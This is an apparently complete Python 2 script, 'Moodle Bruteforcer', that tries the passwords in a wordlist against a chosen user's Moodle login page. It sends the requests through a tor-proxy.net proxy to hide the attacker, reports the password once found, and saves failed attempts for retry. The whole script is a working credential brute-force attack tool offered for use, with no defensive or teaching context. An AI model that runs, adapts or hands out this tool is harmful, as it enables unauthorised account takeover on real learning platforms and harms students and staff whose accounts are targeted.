#!/usr/bin/env python import urllib2, sys, re, urllib, time, getopt def interrupt(): print "\n[EE] User intervention" sys.exit(1) def printopts(): print """./moodle_bruteforcer [-n] \t-n = Disable verbosity should be the login page of the site. Eg: http://www.example.com/login/index.php should be the user name of the account you want to attack. Eg: cfoster should be the *full* path to a wordlist file to attack with, with one word per line.""" sys.exit(0) t1 = time.time() try: opts = getopt.getopt(sys.argv[1:],'n') except: printopts() if len(opts[1]) != 3: printopts() print """============================================================ Moodle Bruteforcer Written by Stealth- http://www.stealth-x.com/programming/moodle-bruteforcer.php ============================================================ """ try: if opts[0][0][0] == "-n": print "[i] Disabling verbosity" verbose = 0 except IndexError: print "[i] Enabling verbosity" verbose = 1 try: wordlistloc = opts[1][2] user = opts[1][1] attackloc = opts[1][0] # count wordlist length for monitering purposes wordlist = open(wordlistloc) length = 0 for word in wordlist: length+=1 wordlist.close() # done wordlist = open(wordlistloc) if verbose: print "[i] Using wordlist: " + wordlistloc print "[i] Targeting user: " + user print "[i] Attacking site: " + attackloc except IOError: print "[EE] Error loading wordlist: " + wordlistloc; sys.exit(1) try: sys.stdout.write("[W] Initiating attack in 9") count = 9 while count != 0: sys.stdout.flush() count-=1 time.sleep(1) sys.stdout.write("\b" + str(count)) sys.stdout.write("\bnow\n") found = 0 count = 0 curlength = 0 deniedwords = [] for word in wordlist: count+=1 curlength+=1 word = word.replace("\r","").replace("\n","") if verbose: sys.stdout.write("[A] Trying: " + word + "....") sys.stdout.flush() login_setup = [('username', user),('password', word)] login_data = urllib.urlencode(login_setup) opener = urllib2.build_opener() try: site = opener.open("https://tor-proxy.net/proxy/tor/browse.php?u=" + attackloc + "&b=2", login_data).read() except Exception, mesg: if verbose: sys.stdout.write(" failed.\n") print "[i] Connection Error: " + str(mesg) print "[i] Will try to continue" deniedwords.append(word) continue if re.search("You got here because there was something wrong with your request.",site): # This is tor-proxy.net saying invalid URL. if verbose: sys.stdout.write(" failed.\n") print "[EE] Tor-proxy.net reported a error. If you are seeing this message repeatedly, make sure your site address is in this format: http://www.example.net." # tor-proxy.net randomly gets errors sometimes. So we will append this word to a list that will be dropped into a file at the end, if no correct password has been already found deniedwords.append(word) continue if re.search("Invalid login, please try again",site): if verbose: sys.stdout.write(" failed.") if count > 10: sys.stdout.write(" [" + str(curlength) + "/" + str(length) + " ("+ str(100 * curlength/length) + "%)]\n") count = 0 else: sys.stdout.write("\n") else: if verbose: sys.stdout.write(" success!\n") sys.stdout.flush() print "[i] Successful login password found: " + word found = 1 break except KeyboardInterrupt: interrupt() except EOFError: interrupt() wordlist.close() if not found: print "[i] Reached end of wordlist" lens = len(deniedwords) if lens != 0: print "[i] There are " + str(lens) + " words that did not get checked due to tor-proxy.net failures." print "[i] They are being dropped into the 'drop.txt' file" print "[i] So you may wish to run moodle_bruteforcer again with drop.txt as the wordlist" drop = open("drop.txt","w") for word in deniedwords: drop.write(word) drop.close() print "[i] The bruteforcing process took " + str(time.time()-t1) + " seconds and " + str(curlength) + " attempts." print "[X] Moodle Bruteforcer is now exiting." sys.exit(0)